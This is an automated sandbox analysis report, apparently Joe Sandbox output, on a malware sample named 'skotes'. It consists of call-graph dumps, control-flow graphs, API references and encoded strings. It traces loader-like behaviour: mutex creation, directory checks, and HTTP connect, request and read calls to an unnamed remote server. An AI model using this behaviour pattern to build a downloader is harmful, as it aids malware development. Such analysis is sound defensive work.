RtlAllocateHeap 37594->37595 37596 6a3798 37595->37596 37597 695c10 4 API calls 37596->37597 37600 6a37a3 37597->37600 37691 6ac199 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37598->37691 37600->37585 37601 6a37ef 37600->37601 37602 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37601->37602 37606 6a3811 ISource 37602->37606 37604 6998f0 4 API calls 37605 6a3872 37604->37605 37607 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37605->37607 37612 6a3c79 ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37605->37612 37606->37591 37606->37604 37608 6a3889 37607->37608 37609 695c10 4 API calls 37608->37609 37610 6a3894 37609->37610 37611 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37610->37611 37613 6a38dc ISource 37611->37613 37612->37580 37692 6ac1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37612->37692 37613->37591 37614 6a39bd 37613->37614 37663 6a3ab7 ISource __dosmaperr 37613->37663 37615 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37614->37615 37634 6a39da ISource 37615->37634 37616 6c8ab6 3 API calls 37617 6a3b7a 37616->37617 37617->37598 37618 6a3b89 37617->37618 37618->37612 37619 6a3c8d 37618->37619 37620 6a3ba2 37618->37620 37621 6a3f42 37618->37621 37622 6a3e74 37618->37622 37624 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37619->37624 37626 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37620->37626 37625 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37621->37625 37627 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37622->37627 37623 6a7a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37628 6a3a96 37623->37628 37631 6a3cb5 37624->37631 37632 6a3f56 37625->37632 37633 6a3bca 37626->37633 37629 6a3e9c 37627->37629 37630 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37628->37630 37635 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37629->37635 37636 6a3aa8 37630->37636 37637 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37631->37637 37638 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37632->37638 37639 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37633->37639 37634->37598 37634->37623 37640 6a3eba 37635->37640 37688 6949a0 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37636->37688 37642 6a3cd3 37637->37642 37643 6a3f6e 37638->37643 37644 6a3be8 37639->37644 37645 695c10 4 API calls 37640->37645 37646 695c10 4 API calls 37642->37646 37647 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37643->37647 37648 695c10 4 API calls 37644->37648 37649 6a3ec1 37645->37649 37650 6a3cda 37646->37650 37651 6a3f86 37647->37651 37652 6a3bef 37648->37652 37654 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37649->37654 37655 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37650->37655 37656 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37651->37656 37653 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37652->37653 37657 6a3c07 37653->37657 37658 6a3ed9 37654->37658 37659 6a3cef 37655->37659 37660 6a3f98 37656->37660 37661 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37657->37661 37662 6a7a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37658->37662 37664 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37659->37664 37690 6a2f10 13 API calls 4 library calls 37660->37690 37666 6a3c1f 37661->37666 37667 6a3ef1 37662->37667 37663->37598 37663->37616 37668 6a3d07 37664->37668 37669 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37666->37669 37670 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37667->37670 37671 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37668->37671 37672 6a3c37 37669->37672 37673 6a3f09 37670->37673 37674 6a3d1f 37671->37674 37675 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37672->37675 37676 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37673->37676 37677 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37674->37677 37678 6a3c4f 37675->37678 37679 6a3f21 37676->37679 37680 6a3d37 37677->37680 37681 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37678->37681 37682 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37679->37682 37683 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37680->37683 37684 6a3c67 37681->37684 37682->37684 37685 6a3d49 37683->37685 37687 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37684->37687 37689 6a1ec0 13 API calls 4 library calls 37685->37689 37687->37612 37688->37663 37689->37612 37690->37612 37692->37580 37717 699ba5 GetFileAttributesA 37718 699bb5 ISource 37717->37718 37719 699c80 ISource 37718->37719 37720 69a91c Concurrency::details::_CancellationTokenState::_RegisterCallback 37718->37720 37722 6a80c0 
Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37719->37722 37721 69a960 Sleep CreateMutexA 37720->37721 37725 69a98e 37721->37725 37723 69a903 37722->37723 37724 69a9a7 37725->37724 37728 6c6629 GetPEB GetPEB IsInExceptionSpec 37725->37728 37727 69a9b0 37728->37727 37777 6c6dda 37778 6c6de8 37777->37778 37779 6c6df6 37777->37779 37780 6c6e4c 8 API calls 37778->37780 37781 6c698d __wsopen_s 2 API calls 37779->37781 37782 6c6df2 37780->37782 37783 6c6e10 37781->37783 37784 6c68ed __wsopen_s RtlAllocateHeap 37783->37784 37785 6c6e1d 37784->37785 37787 6c6e24 __freea 37785->37787 37788 6c6e4c 37785->37788 37789 6c6e77 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37788->37789 37796 6c6e5a __dosmaperr ___std_exception_copy 37788->37796 37790 6c6eb9 CreateFileW 37789->37790 37795 6c6e9d __dosmaperr ___std_exception_copy 37789->37795 37791 6c6edd 37790->37791 37792 6c6eeb 37790->37792 37799 6c6fb4 GetFileType 37791->37799 37811 6c6f2a GetPEB RtlAllocateHeap GetPEB __dosmaperr 37792->37811 37795->37787 37796->37787 37797 6c6ee6 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37797->37795 37798 6c6f1c CloseHandle 37797->37798 37798->37795 37800 6c6fef Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37799->37800 37810 6c7085 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __dosmaperr 37799->37810 37801 6c7028 GetFileInformationByHandle 37800->37801 37800->37810 37802 6c703e 37801->37802 37801->37810 37812 6c727c 37802->37812 37806 6c705b 37807 6c7124 SystemTimeToTzSpecificLocalTime 37806->37807 37808 6c706e 37807->37808 37809 6c7124 SystemTimeToTzSpecificLocalTime 37808->37809 37809->37810 37810->37797 37811->37797 37813 6c7292 _wcsrchr 37812->37813 37814 6c704a 37813->37814 37826 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37813->37826 37822 6c7124 37814->37822 37816 6c72d6 37816->37814 37827 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37816->37827 
37818 6c72e7 37818->37814 37828 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37818->37828 37820 6c72f8 37820->37814 37829 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37820->37829 37823 6c713c 37822->37823 37824 6c715c SystemTimeToTzSpecificLocalTime 37823->37824 37825 6c7142 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37823->37825 37824->37825 37825->37806 37826->37816 37827->37818 37828->37820 37829->37814 37842 6cac53 37847 6caa29 37842->37847 37844 6cac69 37845 6cac92 37844->37845 37855 6d1a9c 37844->37855 37848 6caa48 37847->37848 37853 6caa5b __dosmaperr ___std_exception_copy 37848->37853 37858 6d132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37848->37858 37850 6cabe0 37850->37853 37859 6d132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37850->37859 37852 6cabfe 37852->37853 37860 6d132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37852->37860 37853->37844 37861 6d1461 37855->37861 37857 6d1ab7 37857->37845 37858->37850 37859->37852 37860->37853 37862 6d146d ___scrt_is_nonwritable_in_current_image 37861->37862 37864 6d1474 __dosmaperr ___std_exception_copy __wsopen_s 37862->37864 37865 6d1a2e 37862->37865 37864->37857 37866 6c698d __wsopen_s 2 API calls 37865->37866 37867 6d1a50 37866->37867 37868 6c68ed __wsopen_s RtlAllocateHeap 37867->37868 37869 6d1a5d 37868->37869 37871 6d1a64 __freea 37869->37871 37872 6d1abc 37869->37872 37871->37864 37873 6d1ad9 __wsopen_s 37872->37873 37876 6d1aee __dosmaperr __wsopen_s 37873->37876 37886 6d1775 CreateFileW 37873->37886 37875 6d1be2 GetFileType 37875->37876 37880 6d1c34 __wsopen_s 37875->37880 37876->37871 37877 6d1b65 37877->37875 37877->37876 37887 6d1775 CreateFileW 37877->37887 37879 6d1baa 37879->37875 37879->37876 37883 6d1ca1 37880->37883 37888 6d1984 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37880->37888 37883->37876 37889 6d1522 3 API calls 3 library calls 37883->37889 37884 6d1cd6 37884->37876 37890 6d1775 CreateFileW 37884->37890 37886->37877 
37887->37879 37888->37883 37889->37884 37890->37876

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                          control_flow_graph 438 69e530-69e843 call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 6a9280 call 6a8320 call 6a8220 call 6a8320 call 6a7a00 * 3 call 69be30 call 6a7a00 * 2 call 695c10 call 698580 476 69ea1a-69ea62 438->476 477 69e8ce-69e9ec 438->477 476->477 481 69ea8f-69ea96 call 6ad663 476->481 486 69ea99-69eab2 call 6acff1 477->486 487 69e9f2-69e9fe 477->487 481->486 487->481 489 69ea04-69ea12 487->489 489->476 491 69eab8-69ee79 call 6c6c6a * 2 call 6a7a00 call 695c10 call 6a83c0 call 6a8220 GetFileAttributesA call 6a7a00 call 695c10 call 6a83c0 call 6a8220 GetFileAttributesA 489->491 526 69f5bb-69f66c call 6a80c0 491->526 527 69f273-69f28b 491->527 526->527 531 69f699-69f6a0 call 6ad663 526->531 528 69f291-69f29d 527->528 529 69f6a3-69f6b6 527->529 528->531 532 69f2a3-69f2b1 528->532 531->529 532->526 535 69f6cb-69f962 call 6c6c6a call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 call 6a80c0 call 6a7a00 call 6a80c0 * 2 532->535 570 69f98c-69f9a5 call 6acff1 535->570 571 69f964-69f970 535->571 572 69f982-69f989 call 6ad663 571->572 573 69f972-69f980 571->573 572->570 573->572 575 69f9ab-69fb15 call 6c6c6a call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 573->575 600 69fb3f-69fb4e 575->600 601 69fb17-69fb23 575->601 602 69fb35-69fb3c call 6ad663 601->602 603 69fb25-69fb33 601->603 602->600 603->602 604 69fb4f-69fc6f call 6c6c6a call 6a7a00 call 699580 call 699230 call 6a8320 603->604 620 69fc70-69fc75 604->620 620->620 621 69fc77-6a0860 call 6a80c0 call 6a7a00 * 2 call 69c360 call 6c6729 call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 620->621 656 6a088a-6a08a5 call 6acff1 621->656 657 6a0862-6a086e 621->657 659 6a0880-6a0887 call 6ad663 657->659 660 6a0870-6a087e 657->660 659->656 660->659 663 6a08ce-6a12e4 call 6c6c6a 
call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 660->663 683 6a12e9-6a15f2 663->683
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID:
• String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1o$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
• API String ID: 0-3493852988
• Opcode ID: 5de71fa141f2d22b4582a52e76c9cafb4f5cd1a07f51539a28650b610dc12836
• Instruction ID: f2eb2d1ce58c40435d34ba365b95fb1218825b013e38acfb3ad99e49a9b3a070
• Opcode Fuzzy Hash: 5de71fa141f2d22b4582a52e76c9cafb4f5cd1a07f51539a28650b610dc12836
• Instruction Fuzzy Hash: 8B82A270A04288DBEF14EF68C9497DE7BB6AB06304F50858CE805677C2D7759A88CFD6

Control-flow Graph
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,006E6758), ref: 006D275C
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: InformationTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time$Xgn
• API String ID: 565725191-2117068305
• Opcode ID: 32d5370754baeb773f2a60fedc45b719db730379c93cbe50bf037856100f53ef
• Instruction ID: 008536a796ef66b831a4716370ce73273f88031a516a81ff48e14be50da88745
• Opcode Fuzzy Hash: 32d5370754baeb773f2a60fedc45b719db730379c93cbe50bf037856100f53ef
• Instruction Fuzzy Hash: 6EC10271E002469BDB209F68DC61AFA7BABEF65310F14409FE98197391E731CE46CB54

Control-flow Graph

APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069EB51
• CreateDirectoryA.KERNEL32(00000000), ref: 0069EC83
• GetFileAttributesA.KERNEL32(00000000), ref: 0069ED98
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                                                                          • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1o$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 1875963930-2755506197
                                                                                                                                                                                                                                          • Opcode ID: 1f1dc1b9f8383fb26274178b89b770260d0afd8897ccfe229ea23aca97a30c5f
                                                                                                                                                                                                                                          • Instruction ID: d1882923a164cd639664a39d52a7bf8e9ffcaccf6fc0ec143576b7f042b52e21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f1dc1b9f8383fb26274178b89b770260d0afd8897ccfe229ea23aca97a30c5f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F23971A001489BEF18EB38CD8979DBB77AF82304F14819CE409A77D6DB359E848F95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1240 69be30-69be7c 1241 69c281-69c2a6 call 6a80c0 1240->1241 1242 69be82-69be86 1240->1242 1247 69c2a8-69c2b4 1241->1247 1248 69c2d4-69c2ec 1241->1248 1242->1241 1243 69be8c-69be90 1242->1243 1243->1241 1245 69be96-69bf2a Sleep InternetOpenW InternetConnectA call 6a7a00 call 695c10 1243->1245 1275 69bf2c 1245->1275 1276 69bf2e-69bf4a HttpOpenRequestA 1245->1276 1250 69c2ca-69c2d1 call 6ad663 1247->1250 1251 69c2b6-69c2c4 1247->1251 1252 69c238-69c250 1248->1252 1253 69c2f2-69c2fe 1248->1253 1250->1248 1251->1250 1255 69c34f-69c354 call 6c6c6a 1251->1255 1259 69c323-69c33f call 6acff1 1252->1259 1260 69c256-69c262 1252->1260 1257 69c22e-69c235 call 6ad663 1253->1257 1258 69c304-69c312 1253->1258 1257->1252 1258->1255 1265 69c314 1258->1265 1266 69c319-69c320 call 6ad663 1260->1266 1267 69c268-69c276 1260->1267 1265->1257 1266->1259 1267->1255 1273 69c27c 1267->1273 1273->1266 1275->1276 1277 69bf7b-69bfea call 6a7a00 call 695c10 call 6a7a00 call 695c10 1276->1277 1278 69bf4c-69bf5b 1276->1278 1292 69bfec 1277->1292 1293 69bfee-69c004 HttpSendRequestA 1277->1293 1280 69bf5d-69bf6b 1278->1280 1281 69bf71-69bf78 call 6ad663 1278->1281 1280->1281 1281->1277 1292->1293 1294 69c035-69c05d 1293->1294 1295 69c006-69c015 1293->1295 1298 69c05f-69c06e 1294->1298 1299 69c08e-69c0b5 InternetReadFile 1294->1299 1296 69c02b-69c032 call 6ad663 1295->1296 1297 69c017-69c025 1295->1297 1296->1294 1297->1296 1301 69c070-69c07e 1298->1301 1302 69c084-69c08b call 6ad663 1298->1302 1306 69c0c0-69c168 call 6c4250 InternetReadFile 1299->1306 1301->1302 1302->1299 1314 69c16a-69c170 1306->1314 1314->1306
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000005DC,440B685B,?,00000000), ref: 0069BEB8
                                                                                                                                                                                                                                          • InternetOpenW.WININET(006E8DC8,00000000,00000000,00000000,00000000), ref: 0069BEC7
                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0069BEEC
                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 0069BF36
                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,00000000), ref: 0069BFF6
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 0069C0A8
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,000003FF,?,?,00000000,?,?), ref: 0069C161
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0069C187
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0069C18F
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0069C197
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
